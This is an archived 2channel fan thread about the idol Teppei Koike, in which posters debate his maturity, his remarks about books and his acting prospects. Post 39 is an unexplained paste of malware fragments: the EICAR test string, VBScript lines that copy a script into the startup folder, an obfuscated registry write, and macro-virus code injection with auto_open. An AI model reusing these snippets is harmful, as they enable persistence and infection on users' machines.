2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

小池徹平★★part53★★

1 :無名アイドルくん:2007/02/23(金) 15:22:18 ID:9J0tgFp1
☆2月14日☆
 君に贈る歌/ラッキーでハッピー
 をリリース!!
ttp://www.universal-music.co.jp/wat/




・1月1日「ラブコン」DVD発売中

・森永アロエヨーグルトCM
ttp://www.aloe.ne.jp/

・アクネス CM
ttp://www.rohto.co.jp/nikibi/acnes/

もぎたて果実UV
ttp://www.rohto.co.jp/uv/mogitate/


小池徹平公式HP
ttp://www.teppeifc.com/


2 :無名アイドルくん:2007/02/23(金) 15:25:09 ID:9J0tgFp1
【ルール】
★基本sage進行推奨です。E-mail欄に半角で sage と記入してください。
★番組の実況は、実況ch / 番組ch 等でどうぞ。男ドル板での実況は禁止です。
★タレント及び一般人のプライベート情報の書き込みは禁止です。
★他人に迷惑がかかる書き込み等は一切禁止です。
★煽り荒らしは徹底放置。無視出来ない貴方も同類とみなされます。
★批判と誹謗中傷は別物です。よく考えてから書き込みましょう。
★次スレは>>970が立ててください。

3 :無名アイドルくん:2007/02/23(金) 15:27:36 ID:9J0tgFp1
前スレ
小池徹平★★part52★★
http://music6.2ch.net/test/read.cgi/mendol/1170770747/

【過去ログ】
★★ジュノンボーイグランプリ★★
ttp://music4.2ch.net/test/read.cgi/mendol/1067788044
★★part2★★/1098532076★★part3★★/1108377221
★★part4★★/1112449173★★part5★★/1114850928
★★part6★★/1116781444★★part7★★/1118502404
★★part8★★/1120319480★★part9★★/1121268106

★★part10★★/1122130897★★part11★★/1123567552
★★part12★★/1125238191★★part13★★/1127066958
★★part14★★/1128771661★★part15★★/1130490890
★★part16★★/1131172482★★part17★★/1131590304
★★part18★★/1132333595★★part19★★/1133194256

★★part20★★/1133978140★★part21★★/1134958744
★★part22★★/1136310817★★part23★★/1137140837
★★part24★★/1137921137★★part25★★/1138735130
★★part26★★/1139682449★★part27★★/1140685241
★★part28★★/1141615709★★part29★★/1142613132

★★part30★★/1143713415★★part31★★/1144846891
★★part32★★/1146120156★★part33★★/1147249247
★★part34★★/1147310763★★part35★★/1147389023
★★part36★★/1147580689★★part37★★/1148232722
★★part38★★/1149437487★★part39★★/1151497972

★★part40★★/1152700761★★part41★★/1153847043
★★part43★★/1156616598★★part44★★/1158860377
★★part45★★/1160140616★★part46★★/1161546728
★★part47★★/1162463587★★part48★★/1164532294
★★part49★★/1165836824★★part50★★/1167718009
★★part51★★/1169311091



4 :無名アイドルくん:2007/02/23(金) 15:57:33 ID:O+BiwaVs
>>1
これもテンプレ
小池徹平避難所
http://jbbs.livedoor.jp/music/18720/

5 :無名アイドルくん:2007/02/23(金) 16:31:32 ID:Y/1Qxj8g
>>1乙です

6 :無名アイドルくん:2007/02/23(金) 18:04:08 ID:j6hDDtiQ
>>1乙です

なんか最近の徹平が変な勘違いしだしてる気がして心配。
天狗になってるとか変な意味じゃなくて変に殻を破ろうとしてるというか・・・
マイペースっぽいのになんか危っかしく感じるんだけど。
ないとは思うけど今変なグラドルと撮られたりしたらなにもかもおしまいだよ。
すごい可愛い一般人ならまだいい気がするけど。

7 :無名アイドルくん:2007/02/23(金) 18:09:03 ID:aa/l5m6i
>>6
なんでそー思うの??私はそんなん思わないけど。
「変な意味じゃなくて変に殻を破ろうとしてるというか」←意味がちょとわからん。
おしえてちょ。

8 :無名アイドルくん:2007/02/23(金) 18:18:27 ID:j6hDDtiQ
>>7
わかり辛いよねごめん。
私もよくわかんない。
ちょっと落ち着いて考えるよ。

9 :無名アイドルくん:2007/02/23(金) 18:26:32 ID:aa/l5m6i
>>8
漠然としたもんなのかな。
ソロになって今までにない徹平を見る機会が多くなったで、不安に思う人も居るンかなぁ。

10 :無名アイドルくん:2007/02/23(金) 18:37:51 ID:7c5I2/DO
なんとなくわかる気がする
誰にでもあるような時期なのかも。ちょっと遅い気もするけど

11 :無名アイドルくん:2007/02/23(金) 18:43:20 ID:88HT3XjL
私も「一人で飲みに行く」と言ってて心配にはなった。
過保護なファンww

12 :無名アイドルくん:2007/02/23(金) 19:02:41 ID:9A/6ouo9
前に有名になった出待ちヲタのHPもうないんですか?

13 :無名アイドルくん:2007/02/23(金) 20:18:01 ID:K5UlIQqi
自分はソロなる前から気にはなってたけどね
誰かの知恵入れがあったのかもしれないけど、アドバイスって
本人のために言う言葉ばかりじゃないんだよね
悪くするために、いい人ぶってアドバイスする奴もいるってこと
徹平は気づいているのかね


14 :無名アイドルくん:2007/02/23(金) 20:22:00 ID:YuvlSM2D
何を言ってるの?

15 :無名アイドルくん:2007/02/23(金) 20:37:47 ID:s2dI56HX
ディアフレンズの赤坂の「俺は分かってるよ」的な誘導尋問はウザかった。
徹平も無理に、大人になろう、かっこよくしよう、としないでほしい。
つうかもうちょっとかわいいままでいてほしいんだよね・・・。

16 :無名アイドルくん:2007/02/23(金) 20:45:40 ID:Y/1Qxj8g
だね
外見が大人っぽくなるのはいいんだけど
中身はエンジェルのままでいて欲しい

勝手な願望だが…

17 :無名アイドルくん:2007/02/23(金) 20:46:36 ID:YuvlSM2D
無理に大人になろうとしてるとか、決め付けすぎじゃない?
もう21歳なんだし、普通に大人になっていく歳だよ。
かわいいままでいてほしいとか、勝手な願望で意見されてもね。

18 :無名アイドルくん:2007/02/23(金) 20:50:32 ID:7c5I2/DO
>>15
私が思うのはかっこいいとか可愛いとかじゃなくて
何て言うんだろ…中二病っぽい?は違うか…

19 :無名アイドルくん:2007/02/23(金) 20:55:20 ID:EHzHfP1t
何を思おう

20 :無名アイドルくん:2007/02/23(金) 20:56:38 ID:EHzHfP1t
>>17何を思おうが人それぞれでは?

21 :無名アイドルくん:2007/02/23(金) 20:57:31 ID:EHzHfP1t
ミスったスマソ

22 :無名アイドルくん:2007/02/23(金) 20:57:46 ID:IJ+NZt6N
変に背伸びして大人ぶって、自分を見失ってほしくないっていうのかな?
そのまま自分のペースで無理をしないで成長してったらいいけど
赤坂の無責任な発言を真に受けてほしくないってことでしょ?

23 :無名アイドルくん:2007/02/23(金) 21:02:42 ID:YuvlSM2D
>>20
うん、自由だよ。
でも自分の思いと違うからといって、赤坂さんの言葉を誘導尋問とかウザイとかいうの勝手すぎだと感じた。
徹平自身の発言であるのを否定したいために、なんで人のせいにするのかなって思ってね。


24 :無名アイドルくん:2007/02/23(金) 21:04:23 ID:s2dI56HX
>>22
そうそう。そういうことが言いたかった。
無理してるかどうかは確かに分かんないことだよね。言葉のあやだ。

25 :無名アイドルくん:2007/02/23(金) 21:08:06 ID:88HT3XjL
赤坂さんとは…話がかみ合ってなかったなw

26 :無名アイドルくん:2007/02/23(金) 21:08:43 ID:7c5I2/DO
あれ、皆そういうことなの?
私は逆にもうちょっと大人になってほしい。変な方向の大人じゃなくて
今はたまに見ててほんの少し恥ずかしくなっちゃう時がある

27 :無名アイドルくん:2007/02/23(金) 21:20:48 ID:1gzck8hG
とりあえずSとMの意味くらいは理解して欲しい。

28 :無名アイドルくん:2007/02/23(金) 21:22:01 ID:ToqfYVUP
事務所の方針が変わるまではコッテコテのアイドルだよ。
徹平は真面目だから事務所に従うまで。
本人はファンが思ってるほど子供じゃないんじゃない。

29 :無名アイドルくん:2007/02/23(金) 21:27:29 ID:IJ+NZt6N
見聞を広げるために本とか読めばいいんだけど
挑戦状読むと拒否してるからね、マンガしか読まないのも困りものだわ

30 :無名アイドルくん:2007/02/23(金) 21:34:08 ID:7c5I2/DO
SとMとかは別にわからなくてもいいんだけど
>>29も言ってるちょっと前の「本を読まない」とかの発言とか。
悪い方のことなのに、そういうのかっこいいとか思ってそうな節がない?
歴史なんて過去のことだから勉強する意味ねーよ!って言ってる学生みたい。
誰でもそういう時期はあるけど、もう二十歳なんだからもっと考えてほしい。
いつまでも微笑ましく大人目線でなんて見てられないよ。

31 :無名アイドルくん:2007/02/23(金) 21:35:46 ID:YuvlSM2D
みんな徹平に対して、凄い上から目線なんだね。

32 :無名アイドルくん:2007/02/23(金) 21:51:15 ID:J4wtTEff
本を読まないって発言で、そこまで広げるってw
みんなの中にも、本読まない人だっているんじゃないの?
テレビ見ない人は見ないって答えるだろうし、NETなんかしない人はしないって答えるでしょ。
正直に言った発言を、かっこいいと思って言ってるって捉える方が性格捻くれてるよ。

33 :無名アイドルくん:2007/02/23(金) 21:56:06 ID:7c5I2/DO
>>32
でも本を読まない理由がちょっとひどかったでしょ。あれはない。
ファン以外の人にはあんまり読んでほしくないと思うようなのはやめてほしい。

34 :無名アイドルくん:2007/02/23(金) 21:56:45 ID:IJ+NZt6N
歌詞を書いたり、俳優をやっていくんだったら本は読んだほうがいいよ
自分以外の人が書いたものを読むことで、
いろんな見方や違う世界があるってことを知る方法のひとつだから
自分で何かを創りあげる仕事をしない人は読まなくてもいいけどね

35 :無名アイドルくん:2007/02/23(金) 21:59:46 ID:bKumKNkH
なんだこの流れは…

36 :無名アイドルくん:2007/02/23(金) 22:05:30 ID:YuvlSM2D
いいかげん気持ち悪い。何様のつもりなんだろ。
そんなに気に入らないんなら、ファンレターでも書いて徹平本人に助言してあげれば?

37 :無名アイドルくん:2007/02/23(金) 22:09:00 ID:IJ+NZt6N
>>36
人が何を思おうと自由じゃなかったの?
自分が気に入らない流れだと思ったらスルーしなよ

38 :無名アイドルくん:2007/02/23(金) 22:09:39 ID:bKumKNkH
7c5I2/DOはアンチなの??

39 :無名アイドルくん:2007/02/23(金) 22:11:33 ID:/rojuuKu
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


40 :無名アイドルくん:2007/02/23(金) 22:11:41 ID:bKumKNkH
何思おうと自由だけど、、、この流れは普通によろしくないと思うよ。
話題変えよう。
ラジオで芝居したいって言ってたけど何か決まってる仕事あるんかな。

41 :無名アイドルくん:2007/02/23(金) 22:19:08 ID:+nmA69Ez
最近どことなく徹平に魅力がなくなってきたと思う。
前は純粋とかそういうイメージあったけど、最近では中途半端なイメージしかない。
アロエの歌も原曲そのままを期待していたのに全然違っていたので、私の周囲はガッカリしていた。
印象に残らない歌を作るし、トークも目立たない。
本を読んだり色んな歌を聴いて勉強をして、自分を磨いていって欲しいと思う。
今のままでは生き残れないと感じるのは私だけなんかな

42 :無名アイドルくん:2007/02/23(金) 22:22:33 ID:7c5I2/DO
>>36
気分を悪くしたのならごめん。たまにはこういう話もあってもいいかと思って。
曲が出る時も賛否両論あったりするし(ハバラバとかレディゴーとか)
ファンだからこそ気になることってあると思う。
実際、最近ちょっと変だなって思ってる人も数人いるんだし。
でもアンチかと感じる人もいるみたいだし、この話はこれで終わりにするよ。

43 :無名アイドルくん:2007/02/23(金) 22:23:43 ID:JGx7Jt4w
普通の20歳そこそこの男のノリに憧れてる感じはする
そういうのがないところがいいところなのに
結局基本的な性格が違うから変に無理してるっぽく見える

44 :無名アイドルくん:2007/02/23(金) 22:25:58 ID:bKumKNkH
>>42
アンチにつけこまれて変なお客さんがいっぱい来るから。
ファンのふりしたアンチだらけになっちゃったじゃん。

45 :無名アイドルくん:2007/02/23(金) 22:29:35 ID:+nmA69Ez
芝居といえば、去年今くらいに医龍が決まったのを思い出した。
ドラマにでてほしいなあ。

46 :無名アイドルくん:2007/02/23(金) 22:31:29 ID:7c5I2/DO
>>44
そうだね、ごめんね。
確かに今は前みたいな状況じゃないからアンチがつけこんでくるかもしれないね。

47 :無名アイドルくん:2007/02/23(金) 22:35:10 ID:vQkiijbx
徹平3月から何の仕事すんだろ?
決まってるんなら早く発表してほしい。
歌はもう十分だから役者の仕事きてないんだろうか?

48 :無名アイドルくん:2007/02/23(金) 22:37:49 ID:HRl36OkS
公の場で芝居がんばりたいって言うからには
なにかしら仕事が決まってると思いたいけど
でも4月のドラマはなさそうなんだよね

49 :無名アイドルくん:2007/02/23(金) 22:40:56 ID:+nmA69Ez
元々役者としての徹平が好きだったから、去年は消化不良だった。
出来ればアイドル臭いドラマや映画より、影のある役がいい。

50 :無名アイドルくん:2007/02/23(金) 22:41:02 ID:+4SFVF6F
私はめちゃくちゃ徹平タンの大ファンですが
>>41とか明らかにアンチの意見じゃないですか。
騙されないでくださいね。

ちなみに>>13>>43は分かります。
徹平タンは
・ウエンツいないと何もできない
・かわいいかわいい女の子みたい

この2つをかなりかなりかなり気にしてるんだと思います。
純粋だから徹平タンが心配だ。

51 :無名アイドルくん:2007/02/23(金) 22:42:31 ID:ArujctX+
7月のドラマも主演クラスなら話くらいはきてるのかも。
あとは映画とか…

52 :無名アイドルくん:2007/02/23(金) 22:52:34 ID:+nmA69Ez
>>50
>>41ですが、ある程度大人になったら純粋に好きでいられないんですよ。
別に親でも、親の歳でもないのに、テレビ見るのですらハラハラ見守って、このままでは来年生き残れないんじゃないだろうかとか、心配してしまうんです。
最近は、前みたいなやるぞ的なオーラを感じないし、現状に甘えている感じが凄くします。
だからこそ心配なんです。

16 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)